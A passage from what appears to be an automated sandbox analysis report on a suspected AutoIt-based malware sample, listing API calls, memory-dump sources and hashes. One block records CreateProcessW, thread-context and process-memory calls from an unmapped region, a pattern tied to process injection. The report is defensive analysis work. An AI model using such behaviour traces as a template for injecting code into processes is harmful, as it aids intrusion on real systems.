                                                                                                                            • Instruction Fuzzy Hash: 8A31D171008304AFD724EB60DC46FDF77E8AF46300F104A1FF685921A1EB70A689E782

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1133 c3541d-c35436 1134 c35453 1133->1134 1135 c35438-c3543d 1133->1135 1137 c35455-c3545b 1134->1137 1135->1134 1136 c3543f-c35441 1135->1136 1138 c35443-c35448 call c38b28 1136->1138 1139 c3545c-c35461 1136->1139 1150 c3544e call c38db6 1138->1150 1141 c35463-c3546d 1139->1141 1142 c3546f-c35473 1139->1142 1141->1142 1144 c35493-c354a2 1141->1144 1145 c35483-c35485 1142->1145 1146 c35475-c35480 call c32de0 1142->1146 1148 c354a4-c354a7 1144->1148 1149 c354a9 1144->1149 1145->1138 1147 c35487-c35491 1145->1147 1146->1145 1147->1138 1147->1144 1152 c354ae-c354b3 1148->1152 1149->1152 1150->1134 1155 c354b9-c354c0 1152->1155 1156 c3559c-c3559f 1152->1156 1157 c354c2-c354ca 1155->1157 1158 c35501-c35503 1155->1158 1156->1137 1157->1158 1161 c354cc 1157->1161 1159 c35505-c35507 1158->1159 1160 c3556d-c3556e call c40ba7 1158->1160 1162 c3552b-c35536 1159->1162 1163 c35509-c35511 1159->1163 1169 c35573-c35577 1160->1169 1165 c354d2-c354d4 1161->1165 1166 c355ca 1161->1166 1170 c3553a-c3553d 1162->1170 1171 c35538 1162->1171 1167 c35513-c3551f 1163->1167 1168 c35521-c35525 1163->1168 1172 c354d6-c354d8 1165->1172 1173 c354db-c354e0 1165->1173 1174 c355ce-c355d7 1166->1174 1175 c35527-c35529 1167->1175 1168->1175 1169->1174 1176 c35579-c3557e 1169->1176 1177 c355a4-c355a8 1170->1177 1178 c3553f-c3554b call c346e6 call c40e5b 1170->1178 1171->1170 1172->1173 1173->1177 1179 c354e6-c354ff call c40cc8 1173->1179 1174->1137 1175->1170 1176->1177 1180 c35580-c35591 1176->1180 1181 c355ba-c355c5 call c38b28 1177->1181 1182 c355aa-c355b7 call c32de0 1177->1182 1194 c35550-c35555 1178->1194 1193 c35562-c3556b 1179->1193 1185 c35594-c35596 1180->1185 1181->1150 1182->1181 1185->1155 1185->1156 1193->1185 1195 c3555b-c3555e 1194->1195 1196 c355dc-c355e0 1194->1196 1195->1166 1197 c35560 1195->1197 1196->1174 1197->1193
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1559183368-0
                                                                                                                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                            • Instruction ID: 1ef301eb67ddd39fa5b9b787140574da38843d496cc3e26b5d185cbaa7cf72de
                                                                                                                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                            • Instruction Fuzzy Hash: F551C870A20B05DBDB289F69D88066E77B6AF40331F248729F835962D0D771EE909B41
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
                                                                                                                            • _free.LIBCMT ref: 00C4E263
                                                                                                                            • _free.LIBCMT ref: 00C4E2AA
                                                                                                                              • Part of subcall function 00C16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                            • API String ID: 2861923089-1757145024
                                                                                                                            • Opcode ID: c659117834b7aa4e413df708321ebc92db0db9849f404ad5620755b5fb1caaf2
                                                                                                                            • Instruction ID: cc12e85d8f29835df4b3e6f1fd3d7fbc127b8df0f62f428601d13336104143dd
                                                                                                                            • Opcode Fuzzy Hash: c659117834b7aa4e413df708321ebc92db0db9849f404ad5620755b5fb1caaf2
                                                                                                                            • Instruction Fuzzy Hash: 64919E71910219EFCF14EFA4CC919EDB7B8FF05310F11452AF826AB2A1DB70AA55EB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                                                                              • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                                                                              • Part of subcall function 00C260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C1F930), ref: 00C26154
                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1F9CD
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00C1FA4A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C545C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986988660-3162483948
                                                                                                                            • Opcode ID: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
                                                                                                                            • Instruction ID: 0f8b2d28b3eedc9ed113f58b404fd58c70c84a0b9f1bd09725bd2b41156cf6ab
                                                                                                                            • Opcode Fuzzy Hash: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
                                                                                                                            • Instruction Fuzzy Hash: 3A819AB0916A40CFC784EF39A94476D7BE5FB893067A0812FE519CB372EB7044859F12
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C135A1,SwapMouseButtons,00000004,?), ref: 00C135D4
                                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C135F5
                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C13617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                            • Opcode ID: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
                                                                                                                            • Instruction ID: a444fbc3dfb96eaceb32aa03146ce8bd1bf613cef9e77ac8ba2ee4dfed470285
                                                                                                                            • Opcode Fuzzy Hash: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
                                                                                                                            • Instruction Fuzzy Hash: BB114871610248BFDB208F64DC84AEEB7BCFF46744F00546AF805D7210D2719F95A764
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01026A3B
                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01026AD1
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01026AF3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2438371351-0
                                                                                                                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                            • Instruction ID: 5e0f740a0ecf3d165e9da069972e5195092361a7a40632f111179b2b2bd8e352
                                                                                                                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                            • Instruction Fuzzy Hash: 42621C30A14258DBEB24DFA4C850BDEB776EF58300F1091A9D60DEB390E7769E81CB59
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                                                                              • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                                                                              • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
                                                                                                                            • _free.LIBCMT ref: 00C796A2
                                                                                                                            • _free.LIBCMT ref: 00C796A9
                                                                                                                            • _free.LIBCMT ref: 00C79714
                                                                                                                              • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                                                                              • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                                                                            • _free.LIBCMT ref: 00C7971C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1552873950-0
                                                                                                                            • Opcode ID: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                                                            • Instruction ID: 6950fa332f7878e6f8454ecbaa8a1a74a0ab403e10867f331b336501d4ade745
                                                                                                                            • Opcode Fuzzy Hash: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                                                            • Instruction Fuzzy Hash: 31515DB1D14258AFDF289FA4CC81A9EBBB9EF49300F10449EF20DA7241DB715A81DF58
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2782032738-0
                                                                                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                            • Instruction ID: 8d4230ffa43e9d35eaa8f8f916f52f0689dbb570e421e30056e0c75bf4f2d3c7
                                                                                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                            • Instruction Fuzzy Hash: 5B41C475A207469BDB1CCE69C8809AE77A6EF42364F24817DE825C7680DB70FE81CB41
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C4EA39
                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00C4EA83
                                                                                                                              • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                                                                              • Part of subcall function 00C30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                            • String ID: X
                                                                                                                            • API String ID: 3777226403-3081909835
                                                                                                                            • Opcode ID: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
                                                                                                                            • Instruction ID: 32ccd430b80dd8d0bf1d0c6959e219a42709e5a7c1eaf85a107bdb017564202b
                                                                                                                            • Opcode Fuzzy Hash: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
                                                                                                                            • Instruction Fuzzy Hash: 5E21D271A142589BCF01DF94C845BEEBBF8AF49714F00401AE808AB281DBB4598DEFA1
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock_memmove
                                                                                                                            • String ID: EA06
                                                                                                                            • API String ID: 1988441806-3962188686
                                                                                                                            • Opcode ID: f607b9b85861bb8907be42858c75c1d3eb3bbff1f689c318f20aaa553201a8e4
                                                                                                                            • Instruction ID: f2d69e19110ccdf925c653cb8e4716c1782aa7fcad23842436c8c1d4cf4ecfc6
                                                                                                                            • Opcode Fuzzy Hash: f607b9b85861bb8907be42858c75c1d3eb3bbff1f689c318f20aaa553201a8e4
                                                                                                                            • Instruction Fuzzy Hash: E701F9729042187EDB28CAA8C816EEE7BF8DB11301F00419EF556D2181E874E6089B60
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00C798F8
                                                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C7990F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                            • String ID: aut
                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                            • Opcode ID: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
                                                                                                                            • Instruction ID: 2439ba7f557471a172c37ba3e288a2d45e396fe10efc2303e5495cf4e5b6f3d0
                                                                                                                            • Opcode Fuzzy Hash: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
                                                                                                                            • Instruction Fuzzy Hash: C6D05E7954030DABDB509BA0DC0EF9B773CE704700F0002B6BA94D10A1EAB095998B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
                                                                                                                            • Instruction ID: 589d0ab17de26f11be9e4abfc4cf05a6fa27608ba9161e69cd04ad99b3338b38
                                                                                                                            • Opcode Fuzzy Hash: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
                                                                                                                            • Instruction Fuzzy Hash: 2BF14B716083419FC714EF28C484A6ABBE5FF89318F14892EF9999B351D730E945CF92
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C14370
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C14432
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell_$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1505330794-0
                                                                                                                            • Opcode ID: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
                                                                                                                            • Instruction ID: 38982c91bd16b678f2787cb5395f5222340a892a1f07a4f73a10dca61d62a9ed
                                                                                                                            • Opcode Fuzzy Hash: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
                                                                                                                            • Instruction Fuzzy Hash: DB316FB05057019FD725DF24D8847DBBBF8FB49309F00092EF5AAC2251E771AA88DB52
                                                                                                                            APIs
                                                                                                                            • __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                                                                              • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A192
                                                                                                                              • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A19C
                                                                                                                            • __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                                                                              • Part of subcall function 00C3A1C8: GetModuleFileNameW.KERNEL32(00000000,00CD33BA,00000104,?,00000001,00000000), ref: 00C3A25A
                                                                                                                              • Part of subcall function 00C3A1C8: ___crtMessageBoxW.LIBCMT ref: 00C3A308
                                                                                                                              • Part of subcall function 00C3309F: ___crtCorExitProcess.LIBCMT ref: 00C330A5
                                                                                                                              • Part of subcall function 00C3309F: ExitProcess.KERNEL32 ref: 00C330AE
                                                                                                                              • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                                                                            • RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1372826849-0
                                                                                                                            • Opcode ID: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
                                                                                                                            • Instruction ID: f7bbf1e3de705a91ac110aba160e4e12deb66471a63e3cd3f7190bd0755cb05b
                                                                                                                            • Opcode Fuzzy Hash: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
                                                                                                                            • Instruction Fuzzy Hash: 8D01D475271B42DBD6113739EC86B2E73889F83762F10053AF815EB1E2DEB09E016A61
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C79548,?,?,?,?,?,00000004), ref: 00C798BB
                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C798D1
